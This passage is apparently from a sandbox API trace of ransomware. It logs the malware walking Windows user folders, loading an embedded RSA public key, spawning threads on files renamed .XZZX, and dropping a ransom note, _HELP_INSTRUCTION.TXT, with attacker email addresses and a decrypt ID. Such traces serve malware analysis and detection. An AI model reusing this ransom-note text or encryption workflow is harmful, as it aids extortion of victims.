(in: hFindFile=0x3cdea18, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0179.566] lstrcmpW (lpString1="7B7BA3C4205941180FE9457124712560.XZZX", lpString2="..") returned 1 [0179.566] lstrcmpW (lpString1="7B7BA3C4205941180FE9457124712560.XZZX", lpString2=".") returned 1 [0179.566] StrStrW (lpFirst="7B7BA3C4205941180FE9457124712560.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0179.566] StrStrW (lpFirst="7B7BA3C4205941180FE9457124712560.XZZX", lpSrch="ntldr") returned 0x0 [0179.566] StrStrW (lpFirst="7B7BA3C4205941180FE9457124712560.XZZX", lpSrch="NTLDR") returned 0x0 [0179.566] StrStrW (lpFirst="7B7BA3C4205941180FE9457124712560.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0179.566] StrStrW (lpFirst="7B7BA3C4205941180FE9457124712560.XZZX", lpSrch="ntdetect.com") returned 0x0 [0179.566] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\") returned 63 [0179.566] OutputDebugStringW (lpOutputString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\") [0179.566] lstrcpyA (in: lpString1=0x17a7dc, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0179.566] lstrcpyW (in: lpString1=0x17addc, lpString2="7B7BA3C4205941180FE9457124712560.XZZX" | out: lpString1="7B7BA3C4205941180FE9457124712560.XZZX") returned="7B7BA3C4205941180FE9457124712560.XZZX" [0179.566] lstrcpyW (in: lpString1=0x17a9dc, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\" [0179.566] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17a7dc, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xb10 [0179.567] Sleep (dwMilliseconds=0x96) [0179.718] FindNextFileW (in: hFindFile=0x3cdea18, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0179.718] lstrcmpW (lpString1="_HELP_INSTRUCTION.TXT", lpString2="..") returned 1 [0179.718] lstrcmpW (lpString1="_HELP_INSTRUCTION.TXT", lpString2=".") returned 1 [0179.718] StrStrW (lpFirst="_HELP_INSTRUCTION.TXT", lpSrch="_HELP_INSTRUCTION.TXT") returned="_HELP_INSTRUCTION.TXT" [0179.718] FindNextFileW (in: hFindFile=0x3cdea18, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 0 [0179.718] FindClose (in: hFindFile=0x3cdea18 | out: hFindFile=0x3cdea18) returned 1 [0179.720] FindClose (in: hFindFile=0x3cdea18 | out: hFindFile=0x3cdea18) returned 0 [0179.720] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private" [0179.720] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\*.*" [0179.720] SetErrorMode (uMode=0x1) returned 0x1 [0179.720] wsprintfW (in: param_1=0x17a39c, param_2="%s\\_HELP_INSTRUCTION.TXT" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\_HELP_INSTRUCTION.TXT") returned 80 [0179.721] GetUserNameW (in: lpBuffer=0x178178, pcbBuffer=0x177f64 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x177f64) returned 1 [0179.721] wsprintfW (in: param_1=0x177f70, param_2="FF%08X" | out: param_1="FFE1010314") returned 10 [0179.721] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x177f6c | out: phkResult=0x177f6c*=0xb14) returned 0x0 [0179.721] RegQueryValueExW (in: hKey=0xb14, lpValueName="FFE1010314", lpReserved=0x0, lpType=0x0, lpData=0x437ca68, lpcbData=0x177f68*=0x104 | out: lpType=0x0, lpData=0x437ca68*=0x65, lpcbData=0x177f68*=0x4a) returned 0x0 [0179.721] RegCloseKey (hKey=0xb14) returned 0x0 [0179.721] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55829720, cbMultiByte=-1, lpWideCharStr=0x17939c, cchWideChar=2048 | out: lpWideCharStr="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n") returned 321 [0179.721] wsprintfW (in: param_1=0x17839c, param_2="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n" | out: param_1="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-eb9e4beb-6738-47db-bcc2-4b2202afb33f number\r\n\r\n") returned 354 [0179.721] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\my shapes\\_private\\_help_instruction.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb14 [0179.722] CloseHandle (hObject=0xb14) returned 1 [0179.722] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\*.*", lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 0x3cdea18 [0179.722] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private") returned="_private" [0179.722] lstrcpyW (in: lpString1=0x17a5a4, lpString2="_private" | out: lpString1="_private") returned="_private" [0179.722] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0179.722] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0179.722] FindNextFileW (in: hFindFile=0x3cdea18, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0179.722] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0179.722] FindNextFileW (in: hFindFile=0x3cdea18, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0179.722] FindNextFileW (in: hFindFile=0x3cdea18, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0179.722] FindNextFileW (in: hFindFile=0x3cdea18, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 0 [0179.722] FindClose (in: hFindFile=0x3cdea18 | out: hFindFile=0x3cdea18) returned 1 [0179.722] FindClose (in: hFindFile=0x3cdea18 | out: hFindFile=0x3cdea18) returned 0 [0179.723] FindNextFileW (in: hFindFile=0x43728b8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 0 [0179.723] FindClose (in: hFindFile=0x43728b8 | out: hFindFile=0x43728b8) returned 1 [0179.723] FindClose (in: hFindFile=0x43728b8 | out: hFindFile=0x43728b8) returned 0 [0179.723] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0179.723] lstrcmpW (lpString1="My Videos", lpString2="..") returned 1 [0179.723] lstrcmpW (lpString1="My Videos", lpString2=".") returned 1 [0179.723] lstrcpyW (in: lpString1=0x17d570, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents" [0179.723] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" [0179.723] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", lpString2="My Videos" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Videos") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Videos" [0179.723] SetErrorMode (uMode=0x1) returned 0x1 [0179.723] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Videos" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Videos") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Videos" [0179.723] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Videos", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Videos\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Videos\\" [0179.723] lstrcpyW (in: lpString1=0x5582a700, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Videos\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Videos\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Videos\\" [0179.723] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Videos\\", lpString2="*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Videos\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Videos\\*.*" [0179.723] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Videos\\*.*", lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 0xffffffff [0179.724] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0 [0179.724] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Videos" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Videos") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Videos" [0179.724] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Videos", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Videos\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Videos\\*.*" [0179.724] SetErrorMode (uMode=0x1) returned 0x1 [0179.724] wsprintfW (in: param_1=0x17b43c, param_2="%s\\_HELP_INSTRUCTION.TXT" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Videos\\_HELP_INSTRUCTION.TXT") returned 71 [0179.724] GetUserNameW (in: lpBuffer=0x179218, pcbBuffer=0x179004 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x179004) returned 1 [0179.724] wsprintfW (in: param_1=0x179010, param_2="FF%08X" | out: param_1="FFE1010314") returned 10 [0179.724] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x17900c | out: phkResult=0x17900c*=0xb18) returned 0x0 [0179.724] RegQueryValueExW (in: hKey=0xb18, lpValueName="FFE1010314", lpReserved=0x0, lpType=0x0, lpData=0x437cc98, lpcbData=0x179008*=0x104 | out: lpType=0x0, lpData=0x437cc98*=0x65, lpcbData=0x179008*=0x4a) returned 0x0 [0179.724] RegCloseKey (hKey=0xb18) returned 0x0 [0179.724] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55829720, cbMultiByte=-1, lpWideCharStr=0x17a43c, cchWideChar=2048 | out: lpWideCharStr="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n") returned 321 [0179.724] wsprintfW (in: param_1=0x17943c, param_2="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n" | out: param_1="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-eb9e4beb-6738-47db-bcc2-4b2202afb33f number\r\n\r\n") returned 354 [0179.725] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Videos\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\my videos\\_help_instruction.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb18 [0179.725] CloseHandle (hObject=0xb18) returned 1 [0179.725] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Videos\\*.*", lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 0xffffffff [0179.725] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0 [0179.725] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0179.725] lstrcmpW (lpString1="Outlook Files", lpString2="..") returned 1 [0179.725] lstrcmpW (lpString1="Outlook Files", lpString2=".") returned 1 [0179.725] lstrcpyW (in: lpString1=0x17d570, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents" [0179.725] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" [0179.725] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", lpString2="Outlook Files" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files" [0179.725] SetErrorMode (uMode=0x1) returned 0x1 [0179.725] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files" [0179.725] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\" [0179.725] lstrcpyW (in: lpString1=0x5582a700, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\" [0179.725] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\", lpString2="*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\*.*" [0179.726] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\*.*", lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 0x43728b8 [0179.726] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files") returned="Outlook Files" [0179.726] lstrcpyW (in: lpString1=0x17b644, lpString2="Outlook Files" | out: lpString1="Outlook Files") returned="Outlook Files" [0179.726] FindNextFileW (in: hFindFile=0x43728b8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0179.726] FindNextFileW (in: hFindFile=0x43728b8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0179.726] lstrcmpW (lpString1="7BA753503E40D4C00F297B124258B908.XZZX", lpString2="..") returned 1 [0179.726] lstrcmpW (lpString1="7BA753503E40D4C00F297B124258B908.XZZX", lpString2=".") returned 1 [0179.726] StrStrW (lpFirst="7BA753503E40D4C00F297B124258B908.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0179.726] StrStrW (lpFirst="7BA753503E40D4C00F297B124258B908.XZZX", lpSrch="ntldr") returned 0x0 [0179.727] StrStrW (lpFirst="7BA753503E40D4C00F297B124258B908.XZZX", lpSrch="NTLDR") returned 0x0 [0179.727] StrStrW (lpFirst="7BA753503E40D4C00F297B124258B908.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0179.727] StrStrW (lpFirst="7BA753503E40D4C00F297B124258B908.XZZX", lpSrch="ntdetect.com") returned 0x0 [0179.727] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\") returned 58 [0179.727] OutputDebugStringW (lpOutputString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\") [0179.727] lstrcpyA (in: lpString1=0x17b87c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0179.727] lstrcpyW (in: lpString1=0x17be7c, lpString2="7BA753503E40D4C00F297B124258B908.XZZX" | out: lpString1="7BA753503E40D4C00F297B124258B908.XZZX") returned="7BA753503E40D4C00F297B124258B908.XZZX" [0179.727] lstrcpyW (in: lpString1=0x17ba7c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\" [0179.727] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17b87c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xb1c [0179.727] Sleep (dwMilliseconds=0x96) [0179.873] FindNextFileW (in: hFindFile=0x43728b8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0179.873] lstrcmpW (lpString1="_HELP_INSTRUCTION.TXT", lpString2="..") returned 1 [0179.873] lstrcmpW (lpString1="_HELP_INSTRUCTION.TXT", lpString2=".") returned 1 [0179.874] StrStrW (lpFirst="_HELP_INSTRUCTION.TXT", lpSrch="_HELP_INSTRUCTION.TXT") returned="_HELP_INSTRUCTION.TXT" [0179.874] FindNextFileW (in: hFindFile=0x43728b8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 0 [0179.874] FindClose (in: hFindFile=0x43728b8 | out: hFindFile=0x43728b8) returned 1 [0179.874] FindClose (in: hFindFile=0x43728b8 | out: hFindFile=0x43728b8) returned 0 [0179.874] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files" [0179.874] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\*.*" [0179.875] SetErrorMode (uMode=0x1) returned 0x1 [0179.875] wsprintfW (in: param_1=0x17b43c, param_2="%s\\_HELP_INSTRUCTION.TXT" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\_HELP_INSTRUCTION.TXT") returned 75 [0179.875] GetUserNameW (in: lpBuffer=0x179218, pcbBuffer=0x179004 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x179004) returned 1 [0179.875] wsprintfW (in: param_1=0x179010, param_2="FF%08X" | out: param_1="FFE1010314") returned 10 [0179.875] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x17900c | out: phkResult=0x17900c*=0xb20) returned 0x0 [0179.875] RegQueryValueExW (in: hKey=0xb20, lpValueName="FFE1010314", lpReserved=0x0, lpType=0x0, lpData=0x437cec8, lpcbData=0x179008*=0x104 | out: lpType=0x0, lpData=0x437cec8*=0x65, lpcbData=0x179008*=0x4a) returned 0x0 [0179.875] RegCloseKey (hKey=0xb20) returned 0x0 [0179.875] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55829720, cbMultiByte=-1, lpWideCharStr=0x17a43c, cchWideChar=2048 | out: lpWideCharStr="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n") returned 321 [0179.875] wsprintfW (in: param_1=0x17943c, param_2="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n" | out: param_1="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-eb9e4beb-6738-47db-bcc2-4b2202afb33f number\r\n\r\n") returned 354 [0179.875] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\outlook files\\_help_instruction.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb20 [0179.876] CloseHandle (hObject=0xb20) returned 1 [0179.876] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\*.*", lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 0x43728b8 [0179.877] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files") returned="Outlook Files" [0179.877] lstrcpyW (in: lpString1=0x17b644, lpString2="Outlook Files" | out: lpString1="Outlook Files") returned="Outlook Files" [0179.877] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0179.877] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0179.877] FindNextFileW (in: hFindFile=0x43728b8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0179.877] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0179.877] FindNextFileW (in: hFindFile=0x43728b8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0179.877] FindNextFileW (in: hFindFile=0x43728b8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0179.877] FindNextFileW (in: hFindFile=0x43728b8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 0 [0179.877] FindClose (in: hFindFile=0x43728b8 | out: hFindFile=0x43728b8) returned 1 [0179.877] FindClose (in: hFindFile=0x43728b8 | out: hFindFile=0x43728b8) returned 0 